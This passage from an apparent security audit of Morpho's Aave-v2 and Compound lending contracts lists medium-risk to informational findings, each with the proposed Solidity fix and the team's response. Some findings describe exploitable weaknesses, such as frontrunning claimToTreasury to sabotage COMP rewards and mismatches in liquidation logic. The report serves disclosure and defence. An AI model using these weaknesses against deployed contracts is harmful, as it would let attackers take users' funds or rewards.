+5.2.12 Turning off an asset as collateral on Morpho-Aave still allows seizing of that collateral on Morpho and leads to liquidations Severity: Medium Risk Context: aave-v2/MorphoGovernance.sol#L407, aave-v2/MorphoUtils.sol#L285 Description: The Morpho Aave deployment can set an asset to not be used as collateral for Aave's Morpho contract position. On Aave, this prevents liquidators from seizing this asset as collateral. 1. However, this prevention does not extend to users on Morpho, as Morpho has not implemented this check. Liquidations are performed through a repay & withdraw combination, and withdrawing the asset on Aave is still allowed. 2. When turning off the asset as collateral, the single Morpho contract position on Aave might still be over-collateralized, but some users on Morpho suddenly lose this asset as collateral (LTV becomes 0) and will be liquidated. Recommendation: The feature does not work well with the current version of the Morpho Aave contracts. It must be enabled right from the beginning and may not be set later when users are already borrowing against the asset as collateral on Morpho. Clarify when this feature is supposed to be used, taking into consideration the mentioned issues. Reconsider whether it's required. Morpho: Fixed in PR 1542. Spearbit: Verified.
+5.2.13 claimToTreasury(COMP) steals users' COMP rewards Severity: Medium Risk Context: compound/MorphoGovernance.sol#L414 Description: The claimToTreasury function can send a market's underlying tokens that have accumulated in the contract to the treasury. This is intended to be used for the reserve amounts that accumulate in the contract from P2P matches. However, Compound also pays out rewards in COMP, and COMP is a valid Compound market. Sending the COMP reserves will also send the COMP rewards. This is especially bad as anyone can claim COMP rewards on behalf of Morpho at any time, and the rewards will be sent to the contract. An attacker could even frontrun a claimToTreasury(cCOMP) call with a Comptroller.claimComp(morpho, [cComp]) call to sabotage the reward system. Users won't be able to claim their rewards. Recommendation: If Morpho wants to support the COMP market, consider separating the COMP reserve from the COMP rewards. Morpho: Given the changes required, the small likelihood of setting a reserve factor for the COMP asset, and the awareness on our side about this, we decided not to implement it. Spearbit: Acknowledged.
+5.2.14 Compound liquidity computation uses an outdated cached borrowIndex Severity: Medium Risk Context: compound/MorphoUtils.sol#L211 Description: _isLiquidatable iterates over all user-entered markets and calls _getUserLiquidityDataForAsset(poolToken) -> _getUserBorrowBalanceInOf(poolToken). However, it only updates the indexes of the markets that correspond to the borrow and collateral assets. The _getUserBorrowBalanceInOf function computes the underlying pool amount of the user as userBorrowBalance.onPool.mul(lastPoolIndexes[_poolToken].lastBorrowPoolIndex);. Note that lastPoolIndexes[_poolToken].lastBorrowPoolIndex is a value that was cached by Morpho, and it can be outdated if there has not been a user interaction with that market for a long time. The liquidation then no longer matches Compound's liquidation, and users might not be liquidatable on Morpho while being liquidatable on Compound. Liquidators would first need to trigger updates to Morpho's internal borrow indexes. Recommendation: To match Compound's liquidation procedure, consider using Compound's borrowIndex, which might have been updated after Morpho updated its own internal indexes:

  function _getUserBorrowBalanceInOf(address _poolToken, address _user) internal view returns (uint256) {
      Types.BorrowBalance memory userBorrowBalance = borrowBalanceInOf[_poolToken][_user];
      return userBorrowBalance.inP2P.mul(p2pBorrowIndex[_poolToken]) +
-         userBorrowBalance.onPool.mul(lastPoolIndexes[_poolToken].lastBorrowPoolIndex);
+         userBorrowBalance.onPool.mul(ICToken(_poolToken).borrowIndex());
  }

Morpho: Fixed in PR 1558. Spearbit: Verified.

5.3 Low Risk

+5.3.1 HeapOrdering.getNext returns the root node for nodes not in the list Severity: Low Risk Context: HeapOrdering.sol#L328 Description: If an id does not exist in the HeapOrdering, the getNext() function will return the root node:

uint256 rank = _heap.ranks[_id]; // @audit returns 0 as rank; rank + 1 will be the root
if (rank < _heap.accounts.length) return getAccount(_heap, rank + 1).id;
else return address(0);

Recommendation: Consider returning the zero address if the rank variable is zero (the _id was not found). Morpho: This issue has been fixed in PR 107 and PR 1627. Spearbit: Verified.
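A minimal sketch of the recommended fix, reusing the snippet from the finding above (the surrounding signature and struct name are assumptions):

function getNext(HeapArray storage _heap, address _id) internal view returns (address) {
    uint256 rank = _heap.ranks[_id];
    if (rank == 0) return address(0); // _id is not in the heap: do not fall through to the root
    if (rank < _heap.accounts.length) return getAccount(_heap, rank + 1).id;
    else return address(0);
}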
+5.3.2 Heap only supports balances up to type(uint96).max Severity: Low Risk Context: HeapOrdering.sol#L9 Description: The current heap implementation packs an address and the balance into a single storage slot, which restricts the balance to the uint96 type with a max value of ~7.9e28. If a token has 18 decimals, the largest balance that can be stored will be 7.9e10. This could lead to problems with a token of low value: for example, if 1.0 tokens are worth 0.0001$, a user could only store 7_900_000$. Recommendation: The Aave markets currently don't list a token of such low value. Check token values before listing an Aave market on Morpho, or consider increasing the balance type. Morpho: We updated the asset listing checklist, PR 6. Spearbit: Acknowledged.
+5.3.3 Delta leads to incorrect reward distributions Severity: Low Risk Context: aave-v2/File.sol#L123 Description: Delta describes the amount that is on the pool but still wrongly tracked as inP2P for some users. These users do not have their P2P balance updated to an equivalent pool balance and therefore do not earn rewards. There is now a mismatch of this delta between the pool balance that earns a reward and the sum of pool balances that are tracked in the reward manager to earn that reward. The increase in delta directly leads to an increase in rewards for all other users on the pool. Recommendation: In a future version, think about distributing the share of the delta on the balance that earns rewards (delta / (onPool + delta)) to all P2P suppliers. Morpho: These are quite involved and difficult tasks that would require a lot of changes. For these reasons, we decided not to implement the recommendation. Spearbit: Acknowledged.
+5.3.4 When adding a new rewards manager, users already on the pool won't be earning rewards Severity: Low Risk Context: aave-v2/MatchingEngine.sol#L315, compound/MatchingEngine.sol#L347 Description: When setting a new rewards manager, existing users that are already on the pool are not tracked and won't be earning rewards. Recommendation: There is currently no efficient way to fix this besides initializing the new reward manager with all users who are already on the pool. Users with large pool supplies can resupply / reborrow a tiny amount to the pool to be registered in the new rewards manager. Morpho: It was like this when Aave still had rewards. We have removed it for Aave in PR 1545 and PR 1538. For Compound, we acknowledge this issue. Users will be warned in any case before a rewards manager is set to 0. Spearbit: Verified the Aave rewards removal, and acknowledged the approach for Compound.

5.4 Gas Optimization

+5.4.1 liquidationThreshold computation can be moved for gas efficiency Severity: Gas Optimization Context: aave-v2/MorphoUtils.sol#L320-L323 Description: The vars.liquidationThreshold computation is only relevant if the user is supplying this asset. Therefore, it can be moved into the if (_isSupplying(vars.userMarkets, vars.borrowMask)) branch. Recommendation: Consider changing the code as follows:
  // Cache current asset collateral value.
  uint256 assetCollateralValue;
  if (_isSupplying(vars.userMarkets, vars.borrowMask)) {
      assetCollateralValue = _collateralValue(
          vars.poolToken,
          _user,
          vars.underlyingPrice,
          assetData.tokenUnit
      );
      values.collateral += assetCollateralValue;
      // Calculate LTV for borrow.
      values.maxDebt += assetCollateralValue.percentMul(assetData.ltv);
+     // Update LT variable for withdraw.
+     if (assetCollateralValue > 0)
+         values.liquidationThreshold += assetCollateralValue.percentMul(
+             assetData.liquidationThreshold
+         );
  }

  // Update debt variable for borrowed token.
  if (_poolToken == vars.poolToken && _amountBorrowed > 0)
      values.debt += (_amountBorrowed * vars.underlyingPrice).divUp(assetData.tokenUnit);

- // Update LT variable for withdraw.
- if (assetCollateralValue > 0)
-     values.liquidationThreshold += assetCollateralValue.percentMul(
-         assetData.liquidationThreshold
-     );

Morpho: Fixed in PR 1544. Spearbit: Verified. However, there is a further optimization that can be made. Sample code is provided in "liquidationThreshold computation can be moved for gas efficiency".
+5.4.2 Add max approvals to markets upon market creation Severity: Gas Optimization Context: aave-v2/File.sol#L123 Description: Approvals to the Compound markets are set on each supplyToPool function call. Recommendation: Consider adding a single max approval of type(uint256).max once upon market creation in MorphoGovernance.createMarket to save gas, and remove the other approvals. The Aave-v2 contracts already do this. Morpho: Because it adds complexity to the upgrade process for too small an upside, we decided not to implement it. Spearbit: Acknowledged.

5.5 Informational

+5.5.1 The isP2PDisabled flag is not updated by setIsPausedForAllMarkets Severity: Informational Context: aave-v2/MorphoGovernance.sol#L466-L482, compound/MorphoGovernance.sol#L466-L482 Description: The current implementation of _setPauseStatus does not update isP2PDisabled. When _isPaused = true, this is not a real problem, because once all the flags are enabled (everything is paused), all operations will be blocked at the root of the execution flow. There might instead be cases where isP2PDisabled and the other flags were set for a market and Morpho wants to reset all of them, resuming all operations and allowing users to continue P2P usage. In this case, Morpho would only resume operations without re-enabling the P2P flow for users.

function _setPauseStatus(address _poolToken, bool _isPaused) internal {
    Types.MarketPauseStatus storage pause = marketPauseStatus[_poolToken];
    pause.isSupplyPaused = _isPaused;
    pause.isBorrowPaused = _isPaused;
    pause.isWithdrawPaused = _isPaused;
    pause.isRepayPaused = _isPaused;
    pause.isLiquidateCollateralPaused = _isPaused;
    pause.isLiquidateBorrowPaused = _isPaused;
    // ... event emissions
}

Recommendation: Consider also updating the isP2PDisabled flag if the intended behavior of the function is to update all the flags of a market. Morpho: We acknowledge the risk and won't be fixing this issue. Spearbit: Acknowledged.
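A one-line extension sketch matching the recommendation above; the p2pDisabled mapping name is an assumption and may differ from the actual storage layout:

function _setPauseStatus(address _poolToken, bool _isPaused) internal {
    Types.MarketPauseStatus storage pause = marketPauseStatus[_poolToken];
    pause.isSupplyPaused = _isPaused;
    // ... the other pause flags, as above ...
    pause.isLiquidateBorrowPaused = _isPaused;
    p2pDisabled[_poolToken] = _isPaused; // also disable/re-enable the P2P flow
    // ... event emissions
}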
+5.5.2 Differences between Morpho and Aave liquidate validation logic Severity: Informational Context: aave-v2/ExitPositionsManager.sol#L204-L287, aave-v2/ExitPositionsManager.sol#L468, aave-v2/ExitPositionsManager.sol#L643 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both, we have noticed some differences between them. Note: Morpho re-implements the liquidate function as a mix of
• repay + supply operations on Aave, executed inside _unsafeRepayLogic where needed
• withdraw + borrow operations on Aave, executed inside _unsafeWithdrawLogic where needed
From _unsafeRepayLogic (repay + supply on pool where needed):
• Because _unsafeRepayLogic internally calls aave.supply, the whole tx could fail in case supplying has been disabled on Aave (isFrozen == true) for the _poolTokenBorrowed.
• Morpho is not checking that the Aave borrowAsset has isActive == true.
• Morpho does not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to repay that amount to Aave would make the whole tx revert.
• Morpho does not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to supply that amount to Aave would make the whole tx revert.
From _unsafeWithdrawLogic (withdraw + borrow on pool where needed):
• Because _unsafeWithdrawLogic internally calls aave.borrow, the whole tx could fail in case borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false) for the _poolTokenCollateral.
• Morpho is not checking that the Aave collateralAsset has isActive == true.
• Morpho does not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to withdraw that amount from Aave would make the whole tx revert.
• Morpho does not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert.
More detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Aave". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags: 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged.
+5.5.3 Differences between Morpho and Aave repay validation logic Severity: Informational Context: aave-v2/ExitPositionsManager.sol#L181-L197, aave-v2/ExitPositionsManager.sol#L643 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both, we have noticed some differences between them. Note: Morpho re-implements the repay function as a mix of repay + supply operations on Aave where needed.
• Both Aave and Morpho are not handling ERC20 tokens with fees on transfer.
• Because _unsafeRepayLogic internally calls aave.supply, the whole tx could fail in case supplying has been disabled on Aave (isFrozen == true).
• Morpho is not checking that the Aave market has isActive == true.
• Morpho does not check that remainingToRepay.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to repay that amount to Aave would make the whole tx revert.
• Morpho does not check that remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to supply that amount to Aave would make the whole tx revert.
More detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Aave". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags: 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged.
+5.5.4 Differences between Morpho and Aave withdraw validation logic Severity: Informational Context: aave-v2/ExitPositionsManager.sol#L154-L173, aave-v2/ExitPositionsManager.sol#L468 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both, we have noticed some differences between them. Note: Morpho re-implements the withdraw function as a mix of withdraw + borrow operations on Aave where needed.
• Both Aave and Morpho are not handling ERC20 tokens with fees on transfer.
• Because _unsafeWithdrawLogic internally calls aave.borrow, the whole tx could fail in case borrowing has been disabled on Aave (isFrozen == true or borrowingEnabled == false).
• Morpho is not checking that the Aave market has isActive == true.
• Morpho does not check that remainingToWithdraw.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) > 0. Trying to withdraw that amount from Aave would make the whole tx revert.
• Morpho does not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert.
Note 1: Aave is NOT checking that the market isFrozen. This means that users can withdraw even if the market is active but frozen.
More detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Aave". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags: 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged.
+5.5.5 Differences between Morpho and Aave borrow validation logic Severity: Informational Context: aave-v2/EntryPositionsManager.sol#L188-L280 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both, we have noticed some differences between them. Note: Morpho re-implements the borrow function as a mix of withdraw + borrow operations on Aave where needed.
• Both Aave and Morpho are not handling ERC20 tokens with fees on transfer.
• Morpho is not checking that the Aave market has isFrozen == false (a check done by Aave on the borrow operation); users could be able to borrow in P2P even if borrowing is paused on Aave (isFrozen == true), because Morpho would only call aave.withdraw (where the frozen flag is not checked).
• Morpho does not check if the market is active (would borrowingEnabled == false if the market is not active?).
• Morpho does not check if the market is frozen (would borrowingEnabled == false if the market is not frozen?).
• Morpho does not check that healthFactor > GenericLogic.HEALTH_FACTOR_LIQUIDATION_THRESHOLD.
• Morpho does not check that remainingToBorrow.rayDiv(poolIndexes[_poolToken].poolBorrowIndex) > 0. Trying to borrow that amount from Aave would make the whole tx revert.
More detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Aave". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags: 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged.
+5.5.6 Differences between Morpho and Aave supply validation logic Severity: Informational Context: aave-v2/EntryPositionsManager.sol#L90-L182 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both, we have noticed some differences between them. Note: Morpho re-implements the supply function as a mix of repay + supply operations on Aave where needed.
• Both Aave and Morpho are not handling ERC20 tokens with fees on transfer.
• Morpho is not checking that the Aave market has isFrozen == false; users could be able to supply in P2P even if supplying is paused on Aave (isFrozen == true), because Morpho would only call aave.repay (where the frozen flag is not checked).
• Morpho is not checking whether remainingToSupply.rayDiv(poolIndexes[_poolToken].poolSupplyIndex) == 0. Trying to supply that amount to Aave would make the whole tx revert.
More detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Aave". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags: 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does.
2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged.
+5.5.7 Morpho should avoid creating a new market when the underlying Aave market is frozen Severity: Informational Context: aave-v2/MorphoGovernance.sol#L473 Description: The current implementation of the Aave MorphoGovernance.createMarket only checks whether the AToken is in the active state. Morpho should also check that the AToken is not in a frozen state. When a market is frozen, many operations on the Aave side will be prevented (reverting the transaction). Recommendation: Consider adding a check on the getFrozen() flag when creating a new market. Morpho: The recommendation will only be added to the off-chain checklist followed before creating a new market, PR 6. Spearbit: Acknowledged.
+5.5.8 Differences between Morpho and Compound liquidate validation logic Severity: Informational Context: PositionsManager.sol#L487-L511 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. Note: Morpho's liquidation does not directly call compound.liquidate but acts as a repay + withdraw operation. By reviewing both, we have noticed some differences between them:
• Morpho does not check Compound's seizeGuardianPaused because it is not implementing a "real" liquidate on Compound, but is emulating it as a "repay" + "withdraw". – Morpho should in any case monitor off-chain when the value of seizeGuardianPaused changes to true. What are the scenarios in which Compound decides to block liquidations (across all cTokens)? When this happens, is Compound also pausing all the other operations? – [Open question] Should Morpho pause liquidations when seizeGuardianPaused is true?
• Morpho is not reverting if msg.sender == borrower.
• Morpho does not check if _amount > 0.
• Compound reverts if amountToSeize > userCollateralBalance; Morpho does not revert and instead uses min(amountToSeize, userCollateralBalance).
More detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Compound". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags: 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged.
+5.5.9 repayLogic in the Compound PositionsManager should revert if toRepay is equal to zero Severity: Informational Context: PositionsManager.sol#L471 Description: The current implementation of repayLogic correctly reverts if _amount == 0 but does not revert if toRepay == 0. The value of toRepay is given by the min value between _getUserBorrowBalanceInOf(_poolToken, _onBehalf) and _amount. If the _onBehalf user has zero debt, toRepay will be initialized with zero. Recommendation: Consider reverting if toRepay == 0. Morpho: Acknowledged. Spearbit: Acknowledged.
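A minimal sketch of the recommended guard (the custom error name is hypothetical; Morpho already reverts with a similar error for the _amount == 0 case):

uint256 toRepay = Math.min(_getUserBorrowBalanceInOf(_poolToken, _onBehalf), _amount);
// _onBehalf has no outstanding debt: repaying zero should fail loudly.
if (toRepay == 0) revert AmountIsZero(); // hypothetical error name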
+5.5.10 Differences between Morpho and Compound supply validation logic Severity: Informational Context: compound/PositionsManager.sol#L240-L243 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both, we have noticed some differences between them:
• Compound handles ERC20 tokens that could have transfer fees; Morpho does not do so right now, see "ERC20 tokens with transfer fees are not handled by *PositionsManager".
• Morpho is not checking if the underlying Compound market has been paused for the supply action (see mintGuardianPaused[token]). This means that even if the Compound supply is paused, Morpho could allow users to supply in P2P.
• Morpho is not checking if the market on both Morpho and Compound has been deprecated. If the deprecation flag is intended to be true for a market that will be removed in the near future, Morpho should probably not allow users to provide collateral for such a market.
More detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Compound". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags: 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged.
+5.5.11 Consider creating documentation that covers all of Morpho's own flags, the lending protocols' flags, and how they interact/override each other Severity: Informational Context: General Description: Both Morpho and Aave/Compound have their own flags to check before allowing a user to interact with the protocols. Usually, Morpho has decided to follow the logic of mapping 1:1 the implementation of the underlying protocol's validation. There are also some examples where Morpho has decided to override some of its own internal flags. For example, in the Aave aave-v2/ExitPositionsManager.liquidateLogic, even if a Morpho market has been flagged as "deprecated" (the user can be liquidated without being insolvent), the liquidator would not be able to liquidate the user if the liquidation logic has been paused. Recommendation: Morpho should create in-depth documentation that explains all these flags, how they interact with each other, and the scenarios for which Morpho has decided not to follow the protocol's behavior (if such scenarios exist). The documentation will be very useful to track where and when those flags interact with each other and what could be the possible outcome of a change decision. Morpho: Done internally. Spearbit: Fixed.
+5.5.12 Missing natspec or typos in natspec Severity: Informational Context: General Description:
• Update the natspec of updateP2PIndexes, replacing "exchangeRatesStored()" with "exchangeRateStored()".
• Update the natspec of _updateP2PIndexes, replacing "exchangeRatesStored()" with "exchangeRateStored()".
• Update the natspec for the event MarketCreated, replacing "_poolToken" with "_p2pIndexCursor".
Recommendation: Implement the natspec fixes suggested in the description. Morpho: The recommendations have been implemented in PR 1553. Spearbit: Fixed.
+5.5.13 Remove unused "named" return parameters from functions Severity: Informational Context: MorphoUtils.sol#L42-L48, MorphoUtils.sol#L50-L54 Description: Some functions in the codebase define "named" return parameters that are not used explicitly inside the code. This could lead future changes to return wrong values if the explicit return statement is removed and the function returns the "default" values (based on the variable type) of the named parameters. Recommendation: Remove the named parameters and only use explicit return statements. Morpho: The issues referenced in the "Context" section have been fixed with PR 1548. Spearbit: Acknowledged. Those references were just an example of other cases that have been found in the overall codebase. Morpho should consider checking the whole codebase and refactoring the code, removing the named return parameters where possible or needed.
+5.5.14 Consider merging the code of the CompoundMath libraries and using only one Severity: Informational Context: compound/InterestRatesManager.sol#L7, compound/MorphoUtils.sol#L6, RewardsManager.sol#L7 Description: The current codebase uses libraries/CompoundMath.sol, but there is already an existing Solidity library with the same name inside the @morpho-dao/morpho-utils package. For better code clarity, consider merging those two libraries and only importing the one from the external package. Be aware that the current implementation of the mul and div functions inside the @morpho-dao/morpho-utils CompoundMath uses low-level Yul and should be tested, while the library currently used in the code uses "high-level" Solidity. Recommendation: Consider merging the code of libraries/CompoundMath.sol and the @morpho-dao/morpho-utils CompoundMath, and use only the one imported from the external package. Morpho: The CompoundMath library has been removed from the codebase and replaced by the morpho-utils external libraries (a mix of Math and CompoundMath). Note that while the original implementation of CompoundMath was using plain Solidity, the new one (and the replaced Math functions) use low-level Yul. See PR 1521 and PR 1615. Spearbit: Verified.
+5.5.15 Consider reverting the creation of a deprecated market in Compound Severity: Informational Context: compound/MorphoGovernance.sol#L442 Description: Compound has a mechanism that allows the Governance to set a specific market as "deprecated". Once a market is deprecated, all borrows can be liquidated without checking whether the user is solvent or not. Compound currently allows users to enter (to supply and borrow) such a market. In the current version of MorphoGovernance.createMarket, Morpho governance does not check whether a market has already been deprecated on Compound before entering it and creating a new Morpho market. This would allow a Morpho user to possibly supply or borrow on a market that has already been deprecated by Compound.
Recommendation: Consider reverting the creation of a Morpho market if the cToken has been deprecated on Compound. Morpho: It's unlikely that governance would list a deprecated market, and it doesn't prevent the underlying pool from deprecating a market later either, so we acknowledge this issue. Spearbit: Acknowledged.
+5.5.16 Document HeapOrdering Severity: Informational Context: HeapOrdering.sol#L66 Description: Morpho uses a non-standard heap implementation for its Aave P2P matching engine. The implementation only correctly sorts _maxSortedUsers / 2 instead of the expected _maxSortedUsers. Once _maxSortedUsers is reached, it halves the size of the heap, cutting the last level of leaves of the heap. This is done because a naive implementation that would insert new values at _maxSortedUsers (once the heap is full) and shift them up, then decrease the size to _maxSortedUsers - 1 again, would end up concentrating all new values on the same single path from the leaf to the root node. Cutting off the last level of nodes of the heap is a heuristic to remove low-value nodes (because of the heap property) while at the same time letting new values be shifted up from different leaf locations. In the end, the goal this tries to achieve is that more high-value nodes are stored in the heap and can be used for the matching engine. Recommendation: Document your heap implementation and what it tries to achieve. The _maxSortedUsers value should be of the form 2^k - 1 to have a full binary tree, optimizing the distribution in the last step. The current version that morpho-v1 uses as its dependency does not have as many tests as the latest version of this data structure. Consider updating to the newer, more-tested version. Consider fuzz-testing this data structure to ensure it works with random values in unpredictable insertion order. Morpho: An issue has been created for this (issue 109) but not implemented yet. Spearbit: Acknowledged.
+5.5.17 Consider removing the Aave-v2 reward management logic if it is not used anymore Severity: Informational Context:
• aave-v2/Morpho.sol#L148-L172
• aave-v2/Morpho.sol#L17-L26
• aave-v2/MorphoGovernance.sol
• aave-v2/MatchingEngine.sol#L314-L321
• aave-v2/MatchingEngine.sol#L340-L351
Description: If the current aave-v2 reward program has ended and the Aave protocol is not re-introducing it anytime soon (if at all), consider removing the code that currently handles all the logic behind claiming rewards from the Aave lending pool for the supplied/borrowed assets. Removing that code would make the codebase cleaner, reduce the attack surface, and avoid possible reverts in case some of the state variables are misconfigured (rewards management on Morpho is activated but Aave is not distributing rewards anymore). Recommendation: Consider removing the Aave-v2 reward management logic if it is not used anymore. Morpho: The recommendations have been implemented in PR 1545. The storage variables have been marked with a "Deprecated" comment, and the claimRewards function in the Morpho contract now has an empty body. Spearbit: Fixed. As an additional recommendation, Morpho should notify, well in advance, all the integrators that rely on these APIs about the changes that will be deployed.
+5.5.18 Avoid shadowing state variables Severity: Informational Context: aave-v2/EntryPositionsManager.sol#L99, aave-v2/EntryPositionsManager.sol#L194, aave-v2/MorphoGovernance.sol#L444, aave-v2/MorphoGovernance.sol#L482, aave-v2/InterestRatesManager.sol#L61 Description: Shadowing state or global variables could lead to potential bugs if the developer does not treat them carefully. To avoid any possible problem, every local variable should avoid shadowing a state or global variable name. Recommendation: Rename the local-scope variables with different names than the storage variables to avoid shadowing. Morpho: We won't change the variable naming as we consider it not worth doing right now. Thus, we acknowledge this issue. Spearbit: Acknowledged.
+5.5.19 Governance setter functions do not check the current state before updates Severity: Informational Context: aave-v2/MorphoGovernance.sol#L178-L413, compound/MorphoGovernance.sol Description: In MorphoGovernance.sol, many of the setter functions allow the state to be changed even if it is already set to the passed-in argument. For example, when calling setP2PDisabled, there are no checks to see if the _poolToken is already disabled, which allows unnecessary state changes. Recommendation: The current state should be checked in important setter functions, and if the new state is a duplicate, the function should revert. Morpho: We do not think it's worth adding this check, as the end result is the same whether there is a revert or not, so we acknowledge this issue. Spearbit: Acknowledged.
+5.5.20 Emit an event for the amount of dust used to cover withdrawals Severity: Informational Context: aave-v2/PositionsManagerUtils.sol#L62 Description: Consider emitting an event that includes the amount of dust that was covered by the contract balance. A couple of ways this could be used: • Trigger an alert whenever it exceeds a certain threshold so you can inspect it, and pause if a bug is found or a threshold is exceeded. • Use this value as part of your overall balance accounting to verify everything adds up. Recommendation: Emit an event when a withdrawal is done. Morpho: The amount is assumed to be very small, and because of this we consider it not worth adding an event for this purpose. Spearbit: Acknowledged.
+5.5.21 Break up long functions into smaller composable functions Severity: Informational Context: aave-v2/EntryPositionsManager.sol#L90, aave-v2/EntryPositionsManager.sol#L188, aave-v2/ExitPositionsManager.sol#L204, aave-v2/ExitPositionsManager.sol#L336, aave-v2/ExitPositionsManager.sol#L491 Description: A few functions are 100+ lines of code, which makes it more challenging to initially grasp what the function is doing. You should consider breaking these up into smaller functions, which would make it easier to grasp the logic of the function while also enabling you to easily unit test the smaller functions. Recommendation: Refactor these long functions to instead be comprised of smaller functions. If all is done correctly, the entire existing test suite should pass. Add new tests for the new functions. Morpho: Because this requires large changes to the codebase, we prefer to acknowledge this recommendation. Spearbit: Acknowledged.
+5.5.22 Remove unused struct members Severity: Informational Context: aave-v2/ExitPositionsManager.sol#L140 Description: The HealthFactorVars struct contains three attributes, but only the userMarkets attribute is ever set or used. The others should be removed to increase code readability.
Recommendation: Verify that the other two attributes, i and numberOfMarketsCreated, are not needed, and remove them if not. Morpho: Fixed in PR 1557. Spearbit: Verified.
+5.5.23 Remove unused struct Severity: Informational Context: aave-v2/EntryPositionsManager.sol#L76 Description: There is an unused struct BorrowAllowedVars. It should be removed to improve code readability. Recommendation: Verify it is not needed, and remove it if not. Morpho: Fixed in PR 1557. Spearbit: Verified.
+5.5.24 No validation check on prices fetched from the oracle Severity: Informational Context: aave-v2/ExitPositionsManager.sol#L259-L260, aave-v2/MorphoUtils.sol#L272 Description: Currently, in the liquidateLogic function, when fetching the borrowedTokenPrice and collateralPrice from the oracle, the return value is not validated. This is due to the fact that the underlying protocol does not do this check either, but the fact that the underlying protocol does not do validation should not deter Morpho from performing validation checks on prices fetched from oracles. Also, this check is done in the Compound PositionsManager.sol, so for code consistency it should also be done in Aave-v2. Recommendation: The borrowedTokenPrice and collateralPrice fetched from the oracle should be validated, and the transaction reverted if they are zero. Morpho: We'll continue to follow the behavior of Aave and thus acknowledge this issue. Spearbit: Acknowledged.
